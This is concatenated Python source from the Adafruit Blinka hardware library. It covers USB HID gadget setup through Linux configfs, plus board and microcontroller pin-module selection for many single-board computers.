        0x81, 0x06,  # Input (Data,Var,Rel)
        0x09, 0x38,  # Usage (Wheel)
        0x15, 0x81,  # Logical Minimum (-127)
        0x25, 0x7F,  # Logical Maximum (127)
        0x75, 0x08,  # Report Size (8)
        0x95, 0x01,  # Report Count (1)
        0x81, 0x06,  # Input (Data,Var,Rel)
        0xC0,        # End Collection
        0xC0,        # End Collection
    )),
    usage_page=0x1,
    usage=0x02,
    report_ids=[0],
    in_report_lengths=[4],
    out_report_lengths=[0],
)
def disable() -> None:
    """Stop presenting any USB HID devices to the host computer.

    Can be called in ``boot.py``, before USB is connected.
    The HID composite device is normally enabled by default,
    but on some boards with limited endpoints, including STM32F4,
    it is disabled by default. You must turn off another USB device such
    as `usb_cdc` or `storage` to free up endpoints for use by `usb_hid`.
    """
    gadget = this.gadget_root
    # Unbind the gadget from the USB Device Controller first.
    try:
        Path("%s/UDC" % gadget).write_text("", encoding="utf-8")
    except FileNotFoundError:
        pass
    # Drop the per-configuration HID function symlinks.
    for link in Path(gadget).glob("configs/**/hid.usb*"):
        link.unlink()
    # Tear down the configfs tree deepest-first so every rmdir()
    # operates on an already-emptied directory.
    for pattern in (
        "configs/*/strings/*/*",
        "configs/*/strings/*",
        "configs/*",
        "functions/*",
    ):
        for entry in Path(gadget).rglob(pattern):
            if entry.is_dir():
                entry.rmdir()
    try:
        Path(gadget).rmdir()
    except FileNotFoundError:
        pass
    this.devices = []


atexit.register(disable)
def enable(requested_devices: Sequence[Device], boot_device: int = 0) -> None:
    """Specify which USB HID devices that will be available.
    Can be called in ``boot.py``, before USB is connected.

    :param Sequence requested_devices: `Device` objects.
      If `requested_devices` is empty, HID is disabled. The order of the ``Devices``
      may matter to the host. For instance, for MacOS, put the mouse device
      before any Gamepad or Digitizer HID device or else it will not work.
    :param int boot_device: If non-zero, inform the host that support for
      a boot HID device is available.
      If ``boot_device=1``, a boot keyboard is available.
      If ``boot_device=2``, a boot mouse is available. No other values are allowed.
      See below.

    If you enable too many devices at once, you will run out of USB endpoints.
    The number of available endpoints varies by microcontroller.
    CircuitPython will go into safe mode after running ``boot.py`` to inform you if
    not enough endpoints are available.

    **Boot Devices**

    Boot devices implement a fixed, predefined report descriptor, defined in
    https://www.usb.org/sites/default/files/hid1_12.pdf, Appendix B. A USB host
    can request to use the boot device if the USB device says it is available.
    Usually only a BIOS or other kind of limited-functionality
    host needs boot keyboard support.

    For example, to make a boot keyboard available, you can use this code::

      usb_hid.enable((Device.KEYBOARD,), boot_device=1)  # 1 for a keyboard

    If the host requests the boot keyboard, the report descriptor provided by `Device.KEYBOARD`
    will be ignored, and the predefined report descriptor will be used.
    But if the host does not request the boot keyboard,
    the descriptor provided by `Device.KEYBOARD` will be used.

    The HID boot device must usually be the first or only device presented by CircuitPython.
    The HID device will be USB interface number 0.
    To make sure it is the first device, disable other USB devices, including CDC and MSC
    (CIRCUITPY).
    If you specify a non-zero ``boot_device``, and it is not the first device, CircuitPython
    will enter safe mode to report this error.
    """
    this.boot_device = boot_device
    if len(requested_devices) == 0:
        disable()
        return
    # A non-zero boot_device replaces the caller's device list entirely:
    # the boot protocol mandates a fixed report layout.
    if boot_device == 1:
        requested_devices = [Device.BOOT_KEYBOARD]
    if boot_device == 2:
        requested_devices = [Device.BOOT_MOUSE]
    # """
    # 1. Creating the gadgets
    # -----------------------
    #
    # For each gadget to be created its corresponding directory must be created::
    #
    # $ mkdir $CONFIGFS_HOME/usb_gadget/<gadget name>
    #
    # e.g.::
    #
    # $ mkdir $CONFIGFS_HOME/usb_gadget/g1
    #
    # ...
    # ...
    # ...
    #
    # $ cd $CONFIGFS_HOME/usb_gadget/g1
    #
    # Each gadget needs to have its vendor id <VID> and product id <PID> specified::
    #
    # $ echo <VID> > idVendor
    # $ echo <PID> > idProduct
    #
    # A gadget also needs its serial number, manufacturer and product strings.
    # In order to have a place to store them, a strings subdirectory must be created
    # for each language, e.g.::
    #
    # $ mkdir strings/0x409
    #
    # Then the strings can be specified::
    #
    # $ echo <serial number> > strings/0x409/serialnumber
    # $ echo <manufacturer> > strings/0x409/manufacturer
    # $ echo <product> > strings/0x409/product
    # """
    Path("%s/functions" % this.gadget_root).mkdir(parents=True, exist_ok=True)
    Path("%s/configs" % this.gadget_root).mkdir(parents=True, exist_ok=True)
    Path("%s/bcdDevice" % this.gadget_root).write_text(
        "%s" % 1, encoding="utf-8"
    )  # Version 1.0.0
    Path("%s/bcdUSB" % this.gadget_root).write_text(
        "%s" % 0x0200, encoding="utf-8"
    )  # USB 2.0
    Path("%s/bDeviceClass" % this.gadget_root).write_text(
        "%s" % 0x00, encoding="utf-8"
    )  # multipurpose i guess?
    Path("%s/bDeviceProtocol" % this.gadget_root).write_text(
        "%s" % 0x00, encoding="utf-8"
    )
    Path("%s/bDeviceSubClass" % this.gadget_root).write_text(
        "%s" % 0x00, encoding="utf-8"
    )
    Path("%s/bMaxPacketSize0" % this.gadget_root).write_text(
        "%s" % 0x08, encoding="utf-8"
    )
    Path("%s/idProduct" % this.gadget_root).write_text(
        "%s" % 0x0104, encoding="utf-8"
    )  # Multifunction Composite Gadget
    Path("%s/idVendor" % this.gadget_root).write_text(
        "%s" % 0x1D6B, encoding="utf-8"
    )  # Linux Foundation
    # """
    # 2. Creating the configurations
    # ------------------------------
    #
    # Each gadget will consist of a number of configurations, their corresponding
    # directories must be created:
    #
    # $ mkdir configs/<name>.<number>
    #
    # where <name> can be any string which is legal in a filesystem and the
    # <number> is the configuration's number, e.g.::
    #
    # $ mkdir configs/c.1
    #
    # ...
    # ...
    # ...
    #
    # Each configuration also needs its strings, so a subdirectory must be created
    # for each language, e.g.::
    #
    # $ mkdir configs/c.1/strings/0x409
    #
    # Then the configuration string can be specified::
    #
    # $ echo <configuration> > configs/c.1/strings/0x409/configuration
    #
    # Some attributes can also be set for a configuration, e.g.::
    #
    # $ echo 120 > configs/c.1/MaxPower
    # """
    for device in requested_devices:
        # NOTE(review): config_root does not vary with `device`; every device
        # shares the single configuration "device.1" — presumably a deliberate
        # single-configuration gadget, but verify.
        config_root = "%s/configs/device.1" % this.gadget_root
        Path("%s/" % config_root).mkdir(parents=True, exist_ok=True)
        Path("%s/strings/0x409" % config_root).mkdir(parents=True, exist_ok=True)
        Path("%s/strings/0x409/configuration" % config_root).write_text(
            "my configuration", encoding="utf-8"
        )
        Path("%s/MaxPower" % config_root).write_text("150", encoding="utf-8")
        Path("%s/bmAttributes" % config_root).write_text("%s" % 0x080, encoding="utf-8")
        this.devices.append(device)
        # """
        # 3. Creating the functions
        # -------------------------
        #
        # The gadget will provide some functions, for each function its corresponding
        # directory must be created::
        #
        # $ mkdir functions/<name>.<instance name>
        #
        # where <name> corresponds to one of allowed function names and instance name
        # is an arbitrary string allowed in a filesystem, e.g.::
        #
        # $ mkdir functions/ncm.usb0 # usb_f_ncm.ko gets loaded with request_module()
        #
        # ...
        # ...
        # ...
        #
        # Each function provides its specific set of attributes, with either read-only
        # or read-write access. Where applicable they need to be written to as
        # appropriate.
        # Please refer to Documentation/ABI/*/configfs-usb-gadget* for more information. """
        for report_index, report_id in enumerate(device.report_ids):
            function_root = "%s/functions/hid.usb%s" % (this.gadget_root, report_id)
            try:
                Path("%s/" % function_root).mkdir(parents=True)
            except FileExistsError:
                # Function already created for this report id (e.g. shared
                # across devices): skip re-writing its attributes.
                continue
            Path("%s/protocol" % function_root).write_text(
                "%s" % report_id, encoding="utf-8"
            )
            Path("%s/report_length" % function_root).write_text(
                "%s" % device.in_report_lengths[report_index], encoding="utf-8"
            )
            Path("%s/subclass" % function_root).write_text("%s" % 1, encoding="utf-8")
            Path("%s/report_desc" % function_root).write_bytes(device.descriptor)
        # """
        # 4. Associating the functions with their configurations
        # ------------------------------------------------------
        #
        # At this moment a number of gadgets is created, each of which has a number of
        # configurations specified and a number of functions available. What remains
        # is specifying which function is available in which configuration (the same
        # function can be used in multiple configurations). This is achieved with
        # creating symbolic links::
        #
        # $ ln -s functions/<name>.<instance name> configs/<name>.<number>
        #
        # e.g.::
        #
        # $ ln -s functions/ncm.usb0 configs/c.1 """
        # NOTE(review): this runs after the inner loop, so it uses the
        # report_id/function_root left over from the LAST iteration only;
        # devices with several report ids may need one symlink per
        # function — confirm against the configfs gadget docs.
        try:
            Path("%s/hid.usb%s" % (config_root, report_id)).symlink_to(
                function_root
            )
        except FileNotFoundError:
            pass
    # """ 5. Enabling the gadget
    # ----------------------
    # Such a gadget must be finally enabled so that the USB host can enumerate it.
    #
    # In order to enable the gadget it must be bound to a UDC (USB Device
    # Controller)::
    #
    # $ echo <udc name> > UDC
    #
    # where <udc name> is one of those found in /sys/class/udc/*
    # e.g.::
    #
    # $ echo s3c-hsotg > UDC """
    udc = next(Path("/sys/class/udc/").glob("*"))
    Path("%s/UDC" % this.gadget_root).write_text("%s" % udc.name, encoding="utf-8")
__version__ = "8.20.1"
__repo__ = "https://github.com/adafruit/Adafruit_Blinka.git"
__blinka__ = True
import sys
import adafruit_platformdetect.constants.boards as ap_board
from adafruit_blinka.agnostic import board_id, detector
# pylint: disable=wildcard-import,unused-wildcard-import,ungrouped-imports
# pylint: disable=import-outside-toplevel
# Select the board-definition module matching the detected board id and
# re-export its pin names (wildcard import) into this module's namespace,
# so `board.D4`, `board.SCL`, etc. resolve for the running hardware.
if board_id == ap_board.FEATHER_HUZZAH:
    from adafruit_blinka.board.feather_huzzah import *
elif board_id == ap_board.NODEMCU:
    from adafruit_blinka.board.nodemcu import *
elif board_id == ap_board.PYBOARD:
    from adafruit_blinka.board.pyboard import *
elif board_id == ap_board.RASPBERRY_PI_PICO:
    from adafruit_blinka.board.raspberrypi.pico import *
elif (
    detector.board.RASPBERRY_PI_4B
    or detector.board.RASPBERRY_PI_CM4
    or detector.board.RASPBERRY_PI_400
):
    from adafruit_blinka.board.raspberrypi.raspi_4b import *
elif detector.board.any_raspberry_pi_40_pin:
    from adafruit_blinka.board.raspberrypi.raspi_40pin import *
elif detector.board.any_raspberry_pi_cm:
    from adafruit_blinka.board.raspberrypi.raspi_cm import *
elif detector.board.RASPBERRY_PI_B_REV1:
    from adafruit_blinka.board.raspberrypi.raspi_1b_rev1 import *
elif detector.board.RASPBERRY_PI_A or detector.board.RASPBERRY_PI_B_REV2:
    from adafruit_blinka.board.raspberrypi.raspi_1b_rev2 import *
# Many BeagleBone variants share the BeagleBone Black pin definitions.
elif board_id == ap_board.BEAGLEBONE:
    from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_BLACK:
    from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_BLUE:
    from adafruit_blinka.board.beagleboard.beaglebone_blue import *
elif board_id == ap_board.BEAGLEBONE_GREEN:
    from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_GREEN_GATEWAY:
    from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_BLACK_INDUSTRIAL:
    from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_GREEN_WIRELESS:
    from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_BLACK_WIRELESS:
    from adafruit_blinka.board.beagleboard.beaglebone_black import *
elif board_id == ap_board.BEAGLEBONE_POCKETBEAGLE:
    from adafruit_blinka.board.beagleboard.beaglebone_pocketbeagle import *
elif board_id == ap_board.BEAGLEBONE_AI:
    from adafruit_blinka.board.beagleboard.beaglebone_ai import *
elif board_id == ap_board.BEAGLEV_STARLIGHT:
    from adafruit_blinka.board.beagleboard.beaglev_starlight import *
# Several Orange Pi H3-family boards reuse the Orange Pi PC pinout.
elif board_id == ap_board.ORANGE_PI_PC:
    from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_R1:
    from adafruit_blinka.board.orangepi.orangepir1 import *
elif board_id == ap_board.ORANGE_PI_ZERO:
    from adafruit_blinka.board.orangepi.orangepizero import *
elif board_id == ap_board.ORANGE_PI_ONE:
    from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_PC_PLUS:
    from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_LITE:
    from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_PLUS_2E:
    from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_2:
    from adafruit_blinka.board.orangepi.orangepipc import *
elif board_id == ap_board.ORANGE_PI_ZERO_PLUS_2H5:
    from adafruit_blinka.board.orangepi.orangepizeroplus2h5 import *
elif board_id == ap_board.ORANGE_PI_ZERO_PLUS:
    from adafruit_blinka.board.orangepi.orangepizeroplus import *
elif board_id == ap_board.ORANGE_PI_ZERO_2:
    from adafruit_blinka.board.orangepi.orangepizero2 import *
elif board_id == ap_board.ORANGE_PI_3:
    from adafruit_blinka.board.orangepi.orangepi3 import *
elif board_id == ap_board.ORANGE_PI_4:
    from adafruit_blinka.board.orangepi.orangepi4 import *
elif board_id == ap_board.ORANGE_PI_4_LTS:
    from adafruit_blinka.board.orangepi.orangepi4 import *
elif board_id == ap_board.ORANGE_PI_5:
    from adafruit_blinka.board.orangepi.orangepi5 import *
elif board_id == ap_board.BANANA_PI_M2_ZERO:
    from adafruit_blinka.board.bananapi.bpim2zero import *
elif board_id == ap_board.BANANA_PI_M2_PLUS:
    from adafruit_blinka.board.bananapi.bpim2plus import *
elif board_id == ap_board.BANANA_PI_M5:
    from adafruit_blinka.board.bananapi.bpim5 import *
elif board_id == ap_board.GIANT_BOARD:
    from adafruit_blinka.board.giantboard import *
elif board_id == ap_board.JETSON_TX1:
    from adafruit_blinka.board.nvidia.jetson_tx1 import *
elif board_id == ap_board.JETSON_TX2:
    from adafruit_blinka.board.nvidia.jetson_tx2 import *
elif board_id == ap_board.JETSON_TX2_NX:
    from adafruit_blinka.board.nvidia.jetson_tx2_nx import *
elif board_id == ap_board.JETSON_XAVIER:
    from adafruit_blinka.board.nvidia.jetson_xavier import *
elif board_id == ap_board.JETSON_NANO:
    from adafruit_blinka.board.nvidia.jetson_nano import *
elif board_id == ap_board.JETSON_NX:
    from adafruit_blinka.board.nvidia.jetson_nx import *
elif board_id == ap_board.JETSON_AGX_ORIN:
    from adafruit_blinka.board.nvidia.jetson_orin import *
elif board_id in (ap_board.JETSON_ORIN_NX, ap_board.JETSON_ORIN_NANO):
    from adafruit_blinka.board.nvidia.jetson_orin_nx import *
elif board_id == ap_board.CLARA_AGX_XAVIER:
    from adafruit_blinka.board.nvidia.clara_agx_xavier import *
elif board_id == ap_board.CORAL_EDGE_TPU_DEV:
    from adafruit_blinka.board.coral_dev_board import *
elif board_id == ap_board.CORAL_EDGE_TPU_DEV_MINI:
    from adafruit_blinka.board.coral_dev_board_mini import *
elif board_id == ap_board.ODROID_C2:
    from adafruit_blinka.board.hardkernel.odroidc2 import *
elif board_id == ap_board.ODROID_C4:
    from adafruit_blinka.board.hardkernel.odroidc4 import *
elif board_id == ap_board.ODROID_N2:
    from adafruit_blinka.board.hardkernel.odroidn2 import *
elif board_id == ap_board.ODROID_M1:
    from adafruit_blinka.board.hardkernel.odroidm1 import *
elif board_id == ap_board.KHADAS_VIM3:
    from adafruit_blinka.board.khadas.khadasvim3 import *
elif board_id == ap_board.ODROID_XU4:
    from adafruit_blinka.board.hardkernel.odroidxu4 import *
elif board_id == ap_board.DRAGONBOARD_410C:
    from adafruit_blinka.board.dragonboard_410c import *
elif board_id == ap_board.FTDI_FT232H:
    from adafruit_blinka.board.ftdi_ft232h import *
elif board_id == ap_board.FTDI_FT2232H:
    from adafruit_blinka.board.ftdi_ft2232h import *
elif board_id == ap_board.BINHO_NOVA:
    from adafruit_blinka.board.binho_nova import *
elif board_id == ap_board.MICROCHIP_MCP2221:
    from adafruit_blinka.board.microchip_mcp2221 import *
elif board_id == ap_board.GREATFET_ONE:
    from adafruit_blinka.board.greatfet_one import *
elif board_id == ap_board.SIFIVE_UNLEASHED:
    from adafruit_blinka.board.hifive_unleashed import *
elif board_id == ap_board.PINE64:
    from adafruit_blinka.board.pine64 import *
elif board_id == ap_board.PINEH64:
    from adafruit_blinka.board.pineH64 import *
elif board_id == ap_board.SOPINE:
    from adafruit_blinka.board.soPine import *
elif board_id == ap_board.CLOCKWORK_CPI3:
    from adafruit_blinka.board.clockworkcpi3 import *
elif board_id == ap_board.ONION_OMEGA2:
    from adafruit_blinka.board.onion.omega2 import *
elif board_id == ap_board.RADXA_CM3:
    from adafruit_blinka.board.radxa.radxacm3 import *
elif board_id == ap_board.ROCK_PI_3A:
    from adafruit_blinka.board.radxa.rockpi3a import *
elif board_id == ap_board.RADXA_ZERO:
    from adafruit_blinka.board.radxa.radxazero import *
elif board_id == ap_board.ROCK_PI_S:
    from adafruit_blinka.board.radxa.rockpis import *
elif board_id == ap_board.ROCK_PI_4:
    from adafruit_blinka.board.radxa.rockpi4 import *
elif board_id == ap_board.ROCK_PI_4_C_PLUS:
    from adafruit_blinka.board.radxa.rockpi4 import *
elif board_id == ap_board.ROCK_PI_5:
    from adafruit_blinka.board.radxa.rock5 import *
elif board_id == ap_board.ROCK_PI_E:
    from adafruit_blinka.board.radxa.rockpie import *
elif board_id == ap_board.UDOO_X86:
    from adafruit_blinka.board.udoo_x86ultra import *
elif board_id == ap_board.ODYSSEY_X86J41X5:
    from adafruit_blinka.board.x86j41x5 import *
elif board_id == ap_board.STM32MP157C_DK2:
    from adafruit_blinka.board.stm32.stm32mp157c_dk2 import *
elif board_id == ap_board.OSD32MP1_RED:
    from adafruit_blinka.board.stm32.osd32mp1_red import *
elif board_id == ap_board.OSD32MP1_BRK:
    from adafruit_blinka.board.stm32.osd32mp1_brk import *
elif board_id == ap_board.LUBANCAT_IMX6ULL:
    from adafruit_blinka.board.lubancat.lubancat_imx6ull import *
elif board_id == ap_board.LUBANCAT_STM32MP157:
    from adafruit_blinka.board.lubancat.lubancat_stm32mp157 import *
elif board_id == ap_board.LUBANCAT_ZERO:
    from adafruit_blinka.board.lubancat.lubancat_zero import *
elif board_id == ap_board.LUBANCAT1:
    from adafruit_blinka.board.lubancat.lubancat1 import *
elif board_id == ap_board.LUBANCAT2:
    from adafruit_blinka.board.lubancat.lubancat2 import *
elif board_id == ap_board.NANOPI_NEO_AIR:
    from adafruit_blinka.board.nanopi.neoair import *
elif board_id == ap_board.NANOPI_DUO2:
    from adafruit_blinka.board.nanopi.duo2 import *
elif board_id == ap_board.NANOPI_NEO:
    from adafruit_blinka.board.nanopi.neo import *
elif board_id == ap_board.PICO_U2IF:
    from adafruit_blinka.board.pico_u2if import *
elif board_id == ap_board.FEATHER_U2IF:
    from adafruit_blinka.board.feather_u2if import *
elif board_id == ap_board.FEATHER_CAN_U2IF:
    from adafruit_blinka.board.feather_can_u2if import *
elif board_id == ap_board.FEATHER_EPD_U2IF:
    from adafruit_blinka.board.feather_epd_u2if import *
elif board_id == ap_board.FEATHER_RFM_U2IF:
    from adafruit_blinka.board.feather_rfm_u2if import *
elif board_id == ap_board.QTPY_U2IF:
    from adafruit_blinka.board.qtpy_u2if import *
elif board_id == ap_board.ITSYBITSY_U2IF:
    from adafruit_blinka.board.itsybitsy_u2if import *
elif board_id == ap_board.MACROPAD_U2IF:
    from adafruit_blinka.board.macropad_u2if import *
elif board_id == ap_board.QT2040_TRINKEY_U2IF:
    from adafruit_blinka.board.qt2040_trinkey_u2if import *
elif board_id == ap_board.KB2040_U2IF:
    from adafruit_blinka.board.kb2040_u2if import *
elif board_id == ap_board.LICHEE_RV:
    from adafruit_blinka.board.lichee_rv import *
elif board_id == ap_board.SIEMENS_SIMATIC_IOT2050_ADV:
    from adafruit_blinka.board.siemens.siemens_iot2050 import *
elif board_id == ap_board.SIEMENS_SIMATIC_IOT2050_BASIC:
    from adafruit_blinka.board.siemens.siemens_iot2050 import *
elif board_id == ap_board.AML_S905X_CC:
    from adafruit_blinka.board.librecomputer.aml_s905x_cc_v1 import *
elif board_id == ap_board.ROC_RK3328_CC:
    from adafruit_blinka.board.librecomputer.roc_rk3328_cc import *
elif board_id == ap_board.GENERIC_LINUX_PC:
    from adafruit_blinka.board.generic_linux_pc import *
elif "sphinx" in sys.modules:
    # Building documentation: no hardware present, skip board selection.
    pass
elif board_id is None:
    import platform
    import pkg_resources

    package = str(pkg_resources.get_distribution("adafruit_platformdetect")).split()
    raise NotImplementedError(
        f"""
        {package[0]} version {package[1]} was unable to identify the board and/or
        microcontroller running the {platform.system()} platform. Please be sure you
        have the latest packages running:
        'pip3 install --upgrade adafruit-blinka adafruit-platformdetect'
        """
    )
else:
    raise NotImplementedError(f"Board not supported {board_id}.")
if "SCL" in locals() and "SDA" in locals():
def I2C():
"""The singleton I2C interface"""
import busio
return busio.I2C(SCL, SDA)
if "SCLK" in locals() and "MOSI" in locals() and "MISO" in locals():
def SPI():
"""The singleton SPI interface"""
import busio
return busio.SPI(SCLK, MOSI, MISO) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/board.py | board.py |
"""Pins named after their chip name."""
import sys
from adafruit_platformdetect.constants import chips as ap_chip
from adafruit_blinka.agnostic import board_id, chip_id
# We intentionally are patching into this namespace so skip the wildcard check.
# pylint: disable=unused-wildcard-import,wildcard-import,ungrouped-imports
# Select the microcontroller pin-definition module matching the detected
# chip id and re-export its Pin objects into this module's namespace.
if chip_id == ap_chip.ESP8266:
    from adafruit_blinka.microcontroller.esp8266.pin import *
elif chip_id == ap_chip.STM32F405:
    from adafruit_blinka.microcontroller.stm32.stm32f405.pin import *
elif chip_id == ap_chip.RP2040:
    from adafruit_blinka.microcontroller.rp2040.pin import *
elif chip_id == ap_chip.BCM2XXX:
    # Pi 4 family uses the BCM2711; all earlier Pis use the BCM283x map.
    if board_id in [
        "RASPBERRY_PI_4B",
        "RASPBERRY_PI_400",
        "RASPBERRY_PI_CM4",
    ]:
        from adafruit_blinka.microcontroller.bcm2711.pin import *
    else:
        from adafruit_blinka.microcontroller.bcm283x.pin import *
elif chip_id == ap_chip.DRA74X:
    from adafruit_blinka.microcontroller.dra74x.pin import *
elif chip_id == ap_chip.AM33XX:
    from adafruit_blinka.microcontroller.am335x.pin import *
elif chip_id == ap_chip.AM65XX:
    from adafruit_blinka.microcontroller.am65xx.pin import *
elif chip_id == ap_chip.JH71x0:
    from adafruit_blinka.microcontroller.starfive.JH71x0.pin import *
elif chip_id == ap_chip.SUN8I:
    from adafruit_blinka.microcontroller.allwinner.h3.pin import *
elif chip_id == ap_chip.H3:
    from adafruit_blinka.microcontroller.allwinner.h3.pin import *
elif chip_id == ap_chip.H5:
    from adafruit_blinka.microcontroller.allwinner.h5.pin import *
elif chip_id == ap_chip.H6:
    from adafruit_blinka.microcontroller.allwinner.h6.pin import *
elif chip_id == ap_chip.H616:
    from adafruit_blinka.microcontroller.allwinner.h616.pin import *
elif chip_id == ap_chip.SAMA5:
    from adafruit_blinka.microcontroller.sama5.pin import *
elif chip_id == ap_chip.T210:
    from adafruit_blinka.microcontroller.tegra.t210.pin import *
elif chip_id == ap_chip.T186:
    from adafruit_blinka.microcontroller.tegra.t186.pin import *
elif chip_id == ap_chip.T194:
    from adafruit_blinka.microcontroller.tegra.t194.pin import *
elif chip_id == ap_chip.T234:
    from adafruit_blinka.microcontroller.tegra.t234.pin import *
elif chip_id == ap_chip.S905:
    from adafruit_blinka.microcontroller.amlogic.s905.pin import *
elif chip_id == ap_chip.S905X:
    from adafruit_blinka.microcontroller.amlogic.s905x.pin import *
elif chip_id == ap_chip.S905X3:
    from adafruit_blinka.microcontroller.amlogic.s905x3.pin import *
elif chip_id == ap_chip.S905Y2:
    from adafruit_blinka.microcontroller.amlogic.s905y2.pin import *
elif chip_id == ap_chip.S922X:
    from adafruit_blinka.microcontroller.amlogic.s922x.pin import *
elif chip_id == ap_chip.A311D:
    from adafruit_blinka.microcontroller.amlogic.a311d.pin import *
elif chip_id == ap_chip.EXYNOS5422:
    from adafruit_blinka.microcontroller.samsung.exynos5422.pin import *
elif chip_id == ap_chip.APQ8016:
    from adafruit_blinka.microcontroller.snapdragon.apq8016.pin import *
elif chip_id == ap_chip.IMX8MX:
    from adafruit_blinka.microcontroller.nxp_imx8m.pin import *
elif chip_id == ap_chip.IMX6ULL:
    from adafruit_blinka.microcontroller.nxp_imx6ull.pin import *
elif chip_id == ap_chip.HFU540:
    from adafruit_blinka.microcontroller.hfu540.pin import *
elif chip_id == ap_chip.FT232H:
    from adafruit_blinka.microcontroller.ftdi_mpsse.ft232h.pin import *
elif chip_id == ap_chip.FT2232H:
    from adafruit_blinka.microcontroller.ftdi_mpsse.ft2232h.pin import *
elif chip_id == ap_chip.BINHO:
    from adafruit_blinka.microcontroller.nova.pin import *
elif chip_id == ap_chip.LPC4330:
    from adafruit_blinka.microcontroller.nxp_lpc4330.pin import *
elif chip_id == ap_chip.MCP2221:
    from adafruit_blinka.microcontroller.mcp2221.pin import *
elif chip_id == ap_chip.A64:
    from adafruit_blinka.microcontroller.allwinner.a64.pin import *
elif chip_id == ap_chip.A33:
    from adafruit_blinka.microcontroller.allwinner.a33.pin import *
elif chip_id == ap_chip.RK3308:
    from adafruit_blinka.microcontroller.rockchip.rk3308.pin import *
elif chip_id == ap_chip.RK3399:
    from adafruit_blinka.microcontroller.rockchip.rk3399.pin import *
elif chip_id == ap_chip.RK3399_T:
    from adafruit_blinka.microcontroller.rockchip.rk3399.pin import *
elif chip_id == ap_chip.RK3588:
    from adafruit_blinka.microcontroller.rockchip.rk3588.pin import *
elif chip_id == ap_chip.RK3328:
    from adafruit_blinka.microcontroller.rockchip.rk3328.pin import *
elif chip_id == ap_chip.RK3566:
    from adafruit_blinka.microcontroller.rockchip.rk3566.pin import *
elif chip_id == ap_chip.RK3568:
    from adafruit_blinka.microcontroller.rockchip.rk3568.pin import *
elif chip_id == ap_chip.RK3568B2:
    from adafruit_blinka.microcontroller.rockchip.rk3568b2.pin import *
elif chip_id == ap_chip.MIPS24KC:
    from adafruit_blinka.microcontroller.atheros.ar9331.pin import *
elif chip_id == ap_chip.MIPS24KEC:
    from adafruit_blinka.microcontroller.mips24kec.pin import *
elif chip_id == ap_chip.PENTIUM_N3710:
    from adafruit_blinka.microcontroller.pentium.n3710.pin import *
elif chip_id == ap_chip.ATOM_J4105:
    from adafruit_blinka.microcontroller.pentium.j4105.pin import *
elif chip_id == ap_chip.STM32MP157:
    from adafruit_blinka.microcontroller.stm32.stm32mp157.pin import *
elif chip_id == ap_chip.MT8167:
    from adafruit_blinka.microcontroller.mt8167.pin import *
elif chip_id == ap_chip.RP2040_U2IF:
    from adafruit_blinka.microcontroller.rp2040_u2if.pin import *
elif chip_id == ap_chip.D1_RISCV:
    from adafruit_blinka.microcontroller.allwinner.D1.pin import *
elif "sphinx" in sys.modules:
    # Building documentation: provide the generic Pin type only.
    # pylint: disable=unused-import
    from adafruit_blinka.microcontroller.generic_micropython import Pin
elif chip_id == ap_chip.GENERIC_X86:
    print("WARNING: GENERIC_X86 is not fully supported. Some features may not work.")
    from adafruit_blinka.microcontroller.generic_micropython import Pin
elif chip_id is None:
    print(
        "WARNING: chip_id == None is not fully supported. Some features may not work."
    )
    from adafruit_blinka.microcontroller.generic_micropython import Pin
else:
    raise NotImplementedError("Microcontroller not supported: ", chip_id)
import sys
import time
from adafruit_platformdetect.constants import chips as ap_chip
from adafruit_blinka.agnostic import board_id, chip_id
from microcontroller import pin # pylint: disable=unused-import
from microcontroller.pin import Pin # pylint: disable=unused-import
def delay_us(delay):
    """Block for the given number of microseconds."""
    # time.sleep() takes seconds, so convert from usec first.
    seconds = delay / 1e6
    time.sleep(seconds)
# We intentionally are patching into this namespace so skip the wildcard check.
# pylint: disable=unused-wildcard-import,wildcard-import,ungrouped-imports
# Select the microcontroller support module matching the detected chip id
# and re-export its contents into this module's namespace.
if chip_id == ap_chip.ESP8266:
    from adafruit_blinka.microcontroller.esp8266 import *
elif chip_id == ap_chip.STM32F405:
    from adafruit_blinka.microcontroller.stm32.stm32f405 import *
elif chip_id == ap_chip.RP2040:
    from adafruit_blinka.microcontroller.rp2040 import *
elif chip_id == ap_chip.BCM2XXX:
    # Pi 4 family uses the BCM2711; all earlier Pis use the BCM283x module.
    if board_id in [
        "RASPBERRY_PI_4B",
        "RASPBERRY_PI_400",
        "RASPBERRY_PI_CM4",
    ]:
        from adafruit_blinka.microcontroller.bcm2711 import *
    else:
        from adafruit_blinka.microcontroller.bcm283x import *
elif chip_id == ap_chip.DRA74X:
    from adafruit_blinka.microcontroller.dra74x import *
elif chip_id == ap_chip.AM33XX:
    from adafruit_blinka.microcontroller.am335x import *
elif chip_id == ap_chip.AM65XX:
    from adafruit_blinka.microcontroller.am65xx import *
elif chip_id == ap_chip.JH71x0:
    from adafruit_blinka.microcontroller.starfive.JH71x0 import *
elif chip_id == ap_chip.SUN8I:
    from adafruit_blinka.microcontroller.allwinner.h3 import *
elif chip_id == ap_chip.H5:
    from adafruit_blinka.microcontroller.allwinner.h5 import *
elif chip_id == ap_chip.H6:
    from adafruit_blinka.microcontroller.allwinner.h6 import *
elif chip_id == ap_chip.H616:
    from adafruit_blinka.microcontroller.allwinner.h616 import *
elif chip_id == ap_chip.SAMA5:
    from adafruit_blinka.microcontroller.sama5 import *
elif chip_id == ap_chip.T210:
    from adafruit_blinka.microcontroller.tegra.t210 import *
elif chip_id == ap_chip.T186:
    from adafruit_blinka.microcontroller.tegra.t186 import *
elif chip_id == ap_chip.T194:
    from adafruit_blinka.microcontroller.tegra.t194 import *
elif chip_id == ap_chip.T234:
